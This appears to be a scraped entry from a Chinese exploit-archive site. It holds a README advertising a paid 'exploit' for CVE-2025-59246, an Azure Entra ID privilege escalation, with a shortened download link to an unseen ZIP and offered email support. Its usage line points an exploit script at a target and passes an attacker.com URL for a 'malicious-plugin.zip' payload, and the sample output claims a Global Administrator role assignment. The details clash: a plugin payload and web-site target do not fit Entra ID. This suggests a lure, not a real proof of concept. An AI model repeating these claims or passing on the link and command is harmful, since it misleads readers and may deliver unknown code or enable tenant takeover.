关联漏洞
描述
Missing Authentication for Critical Function (CWE-306)
介绍
# CVE-2025-59246 Missing Authentication for Critical Function (CWE-306) - Exploit
## Overview
Azure Entra ID Elevation of Privilege Vulnerability that allows an attacker to gain higher-level access privileges within the Azure Entra ID system
## Exploit:
### [Download here](https://tinyurl.com/vktscj2f)
## Details
+ **CVE ID**: CVE-2025-59246
+ **Published**: 10/09/2025
+ **CVSS**: 9.8
+ **Affected Versoins**:Azure Entra ID all versions
## Impact
Impact: Unauthenticated attackers can gain administrative access, leading to data exfiltration, service disruption, or full tenant compromise.
## Usage
### Prerequisites
- Python 3.8+
- Install dependencies: `pip install -r requirements.txt` (requires `requests` library).
### Basic Elevation
**Target a user (e.g., your test account) and elevate to Global Admin:**
bash
```
python exploit.py --target http://vulnerable-site.com --payload-url http://attacker.com/malicious-plugin.zip
```
### Output
```
[+] Connecting to legacy Graph endpoint...
[+] Bypassing auth check on /beta/admin/roles/sync
[+] Assigning Global Administrator role to testuser@contoso.com
[+] Verification: Role assigned successfully (HTTP 200)
[!] Warning: Role change may take 5-10 mins to propagate.
```
## What's Included:
**a ZIP file with:**
+ exploit.py: Fully functional Python script for payload generation and delivery.
+ Video demo and advanced customization guides.
+ Support: 30 days of email support for setup issues.
+ Disclaimer: This tool is for ethical penetration testing, red teaming, or educational use only. Vendor is not responsible for misuse. Ensure you have permission to test targets.
## Feedback
Your feedback helps improve this project. If you find bugs or have suggestions, please report them on the GitHub issues page or contact me:harveyprime21@outlook.com.
文件快照
[4.0K] /data/pocs/a0c5a738788272147723cfad3286fb7cd0373b06
└── [1.8K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。